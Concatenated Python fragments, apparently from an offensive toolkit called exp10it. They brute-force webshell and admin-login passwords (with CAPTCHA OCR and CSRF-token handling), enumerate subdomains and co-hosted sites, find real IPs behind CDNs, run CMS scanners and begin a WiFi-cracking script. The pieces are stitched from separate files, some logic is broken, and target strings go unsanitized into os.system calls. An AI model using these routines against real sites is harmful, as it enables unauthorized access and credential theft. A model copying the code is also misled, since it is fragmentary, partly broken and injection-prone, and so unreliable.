def crack_webshell(url, anyway=1): # webshll爆破,第二个参数默认为0,如果设置不为0,则不考虑判断是否是webshll,如果设置为1,直接按direct_bao方式爆破 # 如果设置为2,直接按biaodan_bao方式爆破 figlet2file("cracking webshell", 0, True) print("cracking webshell --> %s" % url) print("正在使用吃奶的劲爆破...") ext = get_webshell_suffix_type(url) tmp = check_webshell_url(url) url_http_domain = get_http_domain_from_url(url) if tmp['y2'] == 'direct_bao' or tmp['y2'] == 'biaodan_bao': pass if anyway == 1 or tmp['y2'] == "direct_bao": return_value = crack_ext_direct_webshell_url( url, ModulePath + "dicts/webshell_passwords.txt", ext) if return_value['cracked'] == 0: print("webshell爆破失败 :(") return "" else: # 爆破成功将cracked_webshell_url_info标记为webshell密码信息,并将webshell密码信息加入到相应非urls表 # 中的cracked_webshell_urls_info字段中 strings_to_write = "webshell:%s,password:%s" % ( url, return_value['password']) elif anyway == 2 or tmp['y2'] == "biaodan_bao": pass ''' return_value = crack_allext_biaodan_webshell_url( url, ModulePath + "dicts/user.txt", ModulePath + "dicts/webshell_passwords.txt") if return_value['cracked'] == 0: print("webshell爆破失败 :(") return "" else: # 爆破成功将cracked_webshell_url_info标记为webshell密码信息,并将webshell密码信息加入到相应表中的 # cracked_webshell_urls_info字段中 strings_to_write = "webshell:%s,password:%s" % ( url, return_value['password']) ''' elif tmp['y2'] == "bypass": print( Fore.RED + "congratulations!!! webshell may found and has no password!!!") string = "cracked webshell:%s no password!!!" % url print(Fore.RED + string) # 爆破成功将cracked_webshell_url_info标记为webshell密码信息,并将webshell密码信息加入到相应表中的 # cracked_webshell_urls_info字段中 strings_to_write = "webshell:%s,password:%s" % ( url, return_value['password']) else: strings_to_write = "这不是一个webshell :(" return strings_to_write
def get_sub_domains(target, use_tool="Sublist3r"): # target为http开头+domain # 注意target(http://www.baidu.com)要换成如baidu.com的结果,然后再当作参数传入下面可能用的工具中 # www.baidu.com--->baidu.com,baidu.com是下面工具的参数 # use_tool为子站获取工具选择 # Sublist3r工具详情如下 # 获取子站列表,domain为域名格式,不含http # https://github.com/aboul3la/Sublist3r # works in python2,use os.system get the execute output if target[:4] == "http": domain = target.split("/")[-1] else: print( "make sure your para in get_sub_domains func has scheme like http or https" ) return figlet2file("geting sub domains", 0, True) root_domain = get_root_domain(domain) if os.path.exists(logFolderPath) == False: os.system("mkdir %s" % logFolderPath) if os.path.exists("%s/sub" % logFolderPath) == False: os.system("cd %s && mkdir sub" % logFolderPath) store_file = logFolderPath + "/sub/" + domain.replace(".", "_") + "_sub.txt" Sublist3r_store_file = "Sublist3r.out.txt" subDomainsBrute_store_file = "subDomainsBrute.out.txt" def Sublist3r(domain): # 用Sublist3r方式获取子站 if os.path.exists(ModulePath + "Sublist3r") == False: os.system( "git clone https://github.com/aboul3la/Sublist3r.git %sSublist3r" % ModulePath) # 下面的cd到一个目录只在一句代码中有效,执行完就不在Sublist3r目录里了 os.system("cd %sSublist3r && pip install -r requirements.txt" % ModulePath) # 下面的命令执行不受上面的cd到一个目录影响 os.system("cd %sSublist3r && python sublist3r.py -v -d %s -o %s" % (ModulePath, root_domain, Sublist3r_store_file)) else: os.system("cd %sSublist3r && python sublist3r.py -v -d %s -o %s" % (ModulePath, root_domain, Sublist3r_store_file)) def subDomainsBrute(domain): # 用subDomainsBrute方式获取子站 # https://github.com/lijiejie/subDomainsBrute.git if os.path.exists(ModulePath + "subDomainsBrute") == False: os.system( "git clone https://github.com/lijiejie/subDomainsBrute.git %ssubDomainsBrute" % ModulePath) os.system("pip install dnspython") os.system( "cd %ssubDomainsBrute && python subDomainsBrute.py -i -o %s %s" % (ModulePath, subDomainsBrute_store_file, root_domain)) else: os.system( "cd %ssubDomainsBrute && python subDomainsBrute.py -i -o %s %s" % (ModulePath, subDomainsBrute_store_file, root_domain)) if os.path.exists(store_file) == False: if use_tool == "all": Sublist3r(root_domain) os.system("cat %sSublist3r/%s >> %s" % (ModulePath, Sublist3r_store_file, store_file)) os.system("rm %sSublist3r/%s" % (ModulePath, Sublist3r_store_file)) subDomainsBrute(root_domain) with open( "%ssubDomainsBrute/%s" % (ModulePath, subDomainsBrute_store_file), "r+") as f: with open(store_file, "a+") as outfile: for each in f: if each not in outfile.readlines(): outfile.write(each) os.system("rm %ssubDomainsBrute/%s" % (ModulePath, subDomainsBrute_store_file)) if use_tool == "Sublist3r": Sublist3r(domain) os.system("cat %sSublist3r/%s >> %s" % (ModulePath, Sublist3r_store_file, store_file)) os.system("rm %sSublist3r/%s" % (ModulePath, Sublist3r_store_file)) if use_tool == "subDomainsBrute": subDomainsBrute(domain) os.system("cat %ssubDomainsBrute/%s >> %s" % (ModulePath, subDomainsBrute_store_file, store_file)) os.system("rm %ssubDomainsBrute/%s" % (ModulePath, subDomainsBrute_store_file)) else: # 文件存在说明上次已经获取sub domains print("you have got the sub domains last time") with open(store_file, "r+") as f: string = f.read() return string
### function: try to get the actual ip behind cdn ### date: 2016-11-05 ### author: quanyechavshuo ### blog: http://3xp10it.cc ############################################################# # usage:python3 xcdn.py www.baidu.com import time import os try: import exp10it except: os.system("pip3 install exp10it") # os.system("pip3 install exp10it -U --no-cache-dir") from exp10it import figlet2file try: figlet2file("3xp10it", 0, True) except: pass time.sleep(1) from exp10it import CLIOutput from exp10it import get_root_domain from exp10it import get_string_from_command from exp10it import get_http_or_https from exp10it import post_request from exp10it import get_request from exp10it import checkvpn import sys import re
### ### name: xwifi ### function: auto crack wifi in macOS ### date: 2017-06-07 ### author: quanyechavshuo ### blog: http://3xp10it.cc ############################################################# # 目前只适用于macOS # test on:macOS sierra 10.12.5 import time import os os.system("pip3 install exp10it -U --no-cache --retries 0") from exp10it import figlet2file figlet2file("xwifi", 0, True) time.sleep(1) from exp10it import get_string_from_command from exp10it import get_all_file_name from multiprocessing import Process import re import time import sys os.system("echo testfor_handshake > /tmp/forhandshakedict.txt") a = get_string_from_command("ack") if re.search(r"not found", a, re.I): input( "Please install ack first,eg.brew install ack,after you finished it,press anykey to continue." ) a = get_string_from_command("airport")
def get_pang_domains(target): # 得到target的旁站列表 # target为如http://www.baidu.com的域名,含http if target[:4] == "http": domain = target.split("/")[-1] else: print("please make sure param has scheme http or https") return figlet2file("geting pang domains", 0, True) print(target) import os if False == os.path.exists(LOG_FOLDER_PATH): os.system("mkdir %s" % LOG_FOLDER_PATH) if False == os.path.exists("%s/pang" % LOG_FOLDER_PATH): os.system("cd %s && mkdir pang" % LOG_FOLDER_PATH) domain_pang_file = "%s/pang/%s_pang.txt" % (LOG_FOLDER_PATH, domain.replace(".", "_")) import os import socket if os.path.exists(domain_pang_file): # 文件存在说明上次已经获取过旁站结果 print("you have got the pang domains last time") with open(domain_pang_file, "r+") as f: result = f.read() return result # 如果数据库中存在对应表,但没有内容,说明数据库中表被删除, # 后来由于database_init函数在auto_attack重新运行时被执行,又有了旁站表 # 此时旁站表为空将文件中的旁站写入数据库中 else: domain_list = [] http_domain_list = [] origin_http_domain_url_list = [] #ip = get_ip(domain) xcdn_obj = Xcdn(domain) ip = xcdn_obj.return_value if ip == 0: #此时有cdn但是没有找到真实ip,这种情况不获取旁站,退出当前处理过程 return_string = "Sorry,since I can not find the actual ip behind the cdn,I will not get pang domains." print(return_string) return return_string print(domain) all_nics_ip = socket.gethostbyname_ex(domain)[2] query = "ip:%s" % ip for piece in bing_search(query, 'Web'): if "https://" in piece['Url']: each_domain = piece['Url'][8:-1].split('/')[0] if each_domain not in domain_list and get_ip( each_domain) in all_nics_ip: domain_list.append(each_domain) http_domain_list.append("https://" + each_domain) origin_http_domain_url_list.append(piece['Url']) else: each_domain = piece['Url'][7:-1].split('/')[0] if each_domain not in domain_list and get_ip( each_domain) in all_nics_ip: domain_list.append(each_domain) http_domain_list.append("http://" + each_domain) origin_http_domain_url_list.append(piece['Url']) print(http_domain_list) import os save_url_to_file(http_domain_list, domain_pang_file) f = open(domain_pang_file, "r+") all = f.read() f.close() find_http_domain = re.search( r"(http(s)?://%s)" % re.sub(r"\.", "\.", domain), all) http_domain = "" if find_http_domain: http_domain = find_http_domain.group(1) else: print("can not find http_domain in %s" % domain_pang_file) pang_domains = "" for each in http_domain_list: if re.sub(r"(\s)$", "", each) != target: pang_domains += (each + '\n') #这里返回的是string结果 return pang_domains
############################################################# ### ### _|_|_| _| _| _| _| ### _| _| _| _|_|_| _|_| _| _| _|_|_|_| ### _|_| _|_| _| _| _| _| _| _| _| ### _| _| _| _| _| _| _| _| _| _| ### _|_|_| _| _| _|_|_| _| _| _| _|_| ### _| ### _| ### ### name: blog.py ### function: write blog ### date: 2016-11-02 ### author: quanyechavshuo ### blog: http://3xp10it.cc ############################################################# import time import os from exp10it import figlet2file from exp10it import blog os.system("pip3 install exp10it -U --no-cache") figlet2file("3xp10it",0,True) time.sleep(1) blog()
def crack_admin_login_url( url, user_dict_file=ModulePath + "dicts/user.txt", pass_dict_file=ModulePath + "dicts/pass.txt", yanzhengma_len=0): # 这里的yanzhengma_len是要求的验证码长度,默认不设置,自动获得,根据不同情况人为设置不同值效果更好 # 爆破管理员后台登录url,尝试自动识别验证码,如果管理员登录页面没有验证码,加了任意验证码数据也可通过验证 import requests figlet2file("cracking admin login url", 0, True) print("cracking admin login url:%s" % url) print("正在使用吃奶的劲爆破登录页面...") def crack_admin_login_url_thread(url,username,password): if get_flag[0] == 1: return try_time[0] += 1 if requestAction=="GET": final_request_url=form_action_url final_request_url=re.sub(r"%s=[^&]*" % user_form_name,"%s=%s" % (user_form_name,username),final_request_url) final_request_url=re.sub(r"%s=[^&]*" % pass_form_name,"%s=%s" % (pass_form_name,password),final_request_url) if has_yanzhengma[0]: if needOnlyGetOneYanZhengMa: yanzhengmaValue=onlyOneYanZhengMaValue else: yanzhengmaValue=get_one_valid_yangzhengma_from_src(yanzhengma_src) final_request_url=re.sub(r"%s=[^&]*" % yanzhengma_form_name,"%s=%s" % (yanzhengma_form_name,yanzhengmaValue),final_request_url) if hasCsrfToken: final_request_url=re.sub(r"%s=[^&]*" % csrfTokenName,currentCsrfTokenPart[0],final_request_url) html=s.get(final_request_url).text if hasCsrfToken: csrfTokenValue=get_csrf_token_value_from_html(html) currentCsrfTokenPart[0]=csrfTokenPart+csrfTokenValue else: #post request paramPartValue=form_action_url.split("^")[1] paramList=paramPartValue.split("&") values={} for eachP in paramList: eachPList=eachP.split("=") eachparamName=eachPList[0] eachparamValue=eachPList[1] if eachparamName==user_form_name: eachparamValue=username if eachparamName==pass_form_name: eachparamValue=password values[eachparamName]=eachparamValue if has_yanzhengma[0]: if not needOnlyGetOneYanZhengMa: values[yanzhengma_form_name]=get_one_valid_yangzhengma_from_src(yanzhengma_src) else: values[yanzhengma_form_name]=onlyOneYanZhengMaValue if hasCsrfToken: values[csrfTokenName]=re.search(r"[^=]+=(.*)",currentCsrfTokenPart[0]).group(1) html = s.post(form_action_url.split("^")[0], values).text if hasCsrfToken: csrfTokenValue=get_csrf_token_value_from_html(html) currentCsrfTokenPart[0]=csrfTokenPart+csrfTokenValue USERNAME_PASSWORD = "******" + username + ":" + \ password + ")" + (52 - len(password)) * " " # 每100次计算完成任务的平均速度 left_time = get_remain_time( start[0], biaoji_time[0], remain_time[0], 100, try_time[0], sum[0]) remain_time[0] = left_time sys.stdout.write('-' * (try_time[0] * 100 // sum[0]) + '>' + str(try_time[0] * 100 // sum[0]) + '%' + ' %s/%s remain time:%s %s\r' % (try_time[0], sum[0], remain_time[0], USERNAME_PASSWORD)) sys.stdout.flush() if len(html) > logined_least_length: # 认为登录成功 get_flag[0] = 1 end = time.time() CLIOutput().good_print( "congratulations!!! admin login url cracked succeed!!!", "red") string = "cracked admin login url:%s username and password:(%s:%s)" % ( url, username, password) CLIOutput().good_print(string, "red") return_string[0]=string print("you spend time:" + str(end - start[0])) http_domain_value = get_http_domain_from_url(url) # 经验证terminate()应该只能结束当前线程,不能达到结束所有线程 table_name_list = get_target_table_name_list(http_domain_value) urls_table_name = http_domain_value.split( "/")[-1].replace(".", "_") + "_urls" return {'username': username, 'password': password} def crack_admin_login_url_inside_func(url, username, pass_dict_file): # urls和usernames是相同内容的列表 urls = [] usernames = [] # passwords是pass_dict_file文件对应的所有密码的集合的列表 passwords = [] i = 0 while 1: if os.path.exists(pass_dict_file) is False: print("please input your password dict:>", end=' ') pass_dict_file = input() if os.path.exists(pass_dict_file) is True: break else: break f = open(pass_dict_file, "r+") for each in f: urls.append(url) usernames.append(username) each = re.sub(r"(\s)$", "", each) passwords.append(each) i += 1 f.close() sum[0] = usernames_num * i if needOnlyGetOneYanZhengMa or hasCsrfToken: max_workers=1 else: max_workers=20 with futures.ThreadPoolExecutor(max_workers=max_workers) as executor: executor.map(crack_admin_login_url_thread, urls, usernames, passwords) def get_one_valid_yangzhengma_from_src(yanzhengmaUrl): # 这里不用exp10it模块中打包好的get_request和post_request来发送request请求,因为要保留session在服务器需要 #yanzhengma = get_string_from_url_or_picfile(yanzhengma_src) while 1: import shutil response = s.get(yanzhengmaUrl, stream=True) with open('img.png', 'wb') as out_file: shutil.copyfileobj(response.raw, out_file) del response yanzhengma = get_string_from_url_or_picfile("img.png") os.system("rm img.png") time.sleep(3) if re.search(r"[^a-zA-Z0-9]+", yanzhengma): # time.sleep(3) continue elif re.search(r"\s", yanzhengma): continue elif yanzhengma == "": continue else: if yanzhengma_len != 0: if len(yanzhengma) != yanzhengma_len: continue # print(yanzhengma) # print(len(yanzhengma)) break return yanzhengma a=get_request(url,by="seleniumPhantomJS") get_result = get_user_and_pass_form_from_html(a['content']) user_form_name = get_result['user_form_name'] pass_form_name = get_result['pass_form_name'] if user_form_name is None: print("user_form_name is None") return if pass_form_name is None: print("pass_form_name is None") return form_action_url = a['formActionValue'] #default request action=post requestAction="POST" if a['hasFormAction']: if "^" not in a['formActionValue']: requestAction="GET" else: print("url is not a admin login url entry") return get_flag = [0] return_string=[""] try_time = [0] sum = [0] start = [0] # 用来标记当前时间的"相对函数全局"变量 biaoji_time = [0] # 用来标记当前剩余完成时间的"相对函数全局"变量 tmp = time.time() remain_time = [tmp - tmp] # current_username_password={} has_yanzhengma = [False] find_yanzhengma = get_yanzhengma_form_and_src_from_url(url) if find_yanzhengma: yanzhengma_form_name = find_yanzhengma['yanzhengma_form_name'] yanzhengma_src = find_yanzhengma['yanzhengma_src'] has_yanzhengma = [True] hasCsrfToken=False forCsrfToken=get_url_has_csrf_token(url) if forCsrfToken['hasCsrfToken']: hasCsrfToken=True csrfTokenName=forCsrfToken['csrfTokenName'] csrfTokenPart=csrfTokenName+"=" currentCsrfTokenPart=[""] s = requests.session() # sesssion start place sessionStart=s.get(url) unlogin_length = len(sessionStart.text) # 如果post数据后返回数据长度超过未登录时的0.5倍则认为是登录成功 logined_least_length = unlogin_length + unlogin_length / 2 if hasCsrfToken: csrf_token_value=get_csrf_token_value_from_html(sessionStart.text) currentCsrfTokenPart=[csrfTokenPart+csrf_token_value] needOnlyGetOneYanZhengMa=False if has_yanzhengma[0]: if "^" in form_action_url: #post request print(get_value_from_url(form_action_url.split("^")[0])['y1']) if get_value_from_url(form_action_url.split("^")[0])['y1']!=get_value_from_url(a['currentUrl'])['y1']: # should update yanzhengma everytime needOnlyGetOneYanZhengMa=True else: #get request if get_value_from_url(form_action_url)['y1']!=get_value_from_url(a['currentUrl'])['y1']: needOnlyGetOneYanZhengMa=True if needOnlyGetOneYanZhengMa: print("Congratulation! Target login url need only one yanzhengma!!") import shutil response = s.get(yanzhengma_src, stream=True) with open('img.png', 'wb') as out_file: shutil.copyfileobj(response.raw, out_file) del response onlyOneYanZhengMaValue= input("Please open img.png and input the yanzhengma string:>") #get_string_from_url_or_picfile("img.png") os.system("rm img.png") with open(r"%s" % user_dict_file, "r+") as user_file: all_users = user_file.readlines() usernames_num = len(all_users) start[0] = time.time() for username in all_users: # 曾经双层多线程,没能跑完所有的组合,于是不再这里再开多线程 username = re.sub(r'(\s)$', '', username) crack_admin_login_url_inside_func(a['currentUrl'], username, pass_dict_file) return return_string[0]
def single_cms_scan(target): # 对target根据target的cms类型进行cms识别及相应第三方工具扫描,target可以是主要目标或者是旁站或是子站 # target要求为http+domain格式 figlet2file("cms scaning...", 0, True) print(target) import os cms_value = cms_identify(target) if cms_value == "unknown": return "" # 下面相当于cms_scan过程 if False == os.path.exists(logFolderPath): os.system("mkdir %s" % logFolderPath) if False == os.path.exists(logFolderPath + "/cms_scan_log"): os.system("cd %s && mkdir cms_scan_log" % logFolderPath) if False == os.path.exists(ModulePath + "cms_scan"): os.system("mkdir %s" % ModulePath + "cms_scan") if cms_value == 'discuz': if False == os.path.exists(ModulePath + "log/cms_scan_log/dzscan"): os.system("cd %slog/cms_scan_log && mkdir dzscan" % ModulePath) cms_scaner_list = os.listdir(ModulePath + "cms_scan") if "dzscan" not in cms_scaner_list: os.system( "cd %scms_scan && git clone https://github.com/code-scan/dzscan.git" % ModulePath) log_file = target.split("/")[-1].replace(".", "_") + ".log" if os.path.exists(ModulePath + "log/cms_scan_log/dzscan/" + log_file): pass else: os.system( "cd %scms_scan/dzscan && python dzscan.py --update && python dzscan.py -u %s --log" % (ModulePath, target)) os.system("mv %scms_scan/dzscan/%s %slog/cms_scan_log/dzscan/" % (ModulePath, log_file, ModulePath)) cms_scan_result = "" if os.path.exists(ModulePath + "log/cms_scan_log/dzscan/" + log_file) == True: with open(ModulePath + "log/cms_scan_log/dzscan/" + log_file, "r+") as f: cms_scan_result = f.read() if cms_value == 'joomla': if False == os.path.exists(ModulePath + "log/cms_scan_log/joomscan"): os.system("cd %slog/cms_scan_log && mkdir joomscan" % ModulePath) cms_scaner_list = os.listdir(ModulePath + "cms_scan") if "joomscan" not in cms_scaner_list: os.system("cd %scms_scan && wget \ http://jaist.dl.sourceforge.net/project/joomscan/joomscan/2012-03-10/joomscan-latest.zip \ && unzip joomscan-latest.zip -d joomscan && rm joomscan-latest.zip" % ModulePath) result = get_string_from_command( "perl %scms_scan/joomscan/joomscan.pl" % ModulePath) if re.search(r'you may need to install the Switch module', result): os.system( "sudo apt-get install libswitch-perl && perl -MCPAN -e 'install WWW::Mechanize'" ) log_file = "report/%s-joexploit.txt" % target.split("/")[-1] if os.path.exists(ModulePath + "log/cms_scan_log/joomscan/" + log_file): pass else: os.system( "cd %scms_scan/joomscan && perl joomscan.pl update && perl joomscan.pl -u %s -ot" % (ModulePath, target)) os.system("mv %scms_scan/joomscan/%s log/cms_scan_log/joomscan/ " % (ModulePath, log_file)) with open(ModulePath + "log/cms_scan_log/joomscan/" + log_file[7:], "r+") as f: cms_scan_result = f.read() if cms_value == 'wordpress': if False == os.path.exists(ModulePath + "log/cms_scan_log/wpscan"): os.system("cd %slog/cms_scan_log && mkdir wpscan" % ModulePath) cms_scaner_list = os.listdir(ModulePath + "cms_scan") if "wpscan" not in cms_scaner_list: os.system( "cd %scms_scan && git clone https://github.com/wpscanteam/wpscan.git && cd wpscan && echo y | unzip data.zip" % ModulePath) result = get_string_from_command("ruby %scms_scan/wpscan/wpscan.rb" % ModulePath) if re.search(r'ERROR', result): os.system( "sudo apt-get install libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev \ ruby-dev build-essential libgmp-dev zlib1g-dev") os.system("gem install bundler && bundle install") log_file = "%s.txt" % target.split("/")[-1] if os.path.exists(ModulePath + "log/cms_scan_log/wpscan/" + log_file): pass else: os.system( "cd %scms_scan/wpscan && ruby wpscan.rb --update && ruby wpscan.rb %s | tee %s" % (ModulePath, target, log_file)) os.system("mv %scms_scan/wpscan/%s %slog/cms_scan_log/wpscan/" % (ModulePath, log_file, ModulePath)) with open(ModulePath + "log/cms_scan_log/wpscan/" + log_file, "r+") as f: cms_scan_result = f.read() print(cms_scan_result) return cms_scan_result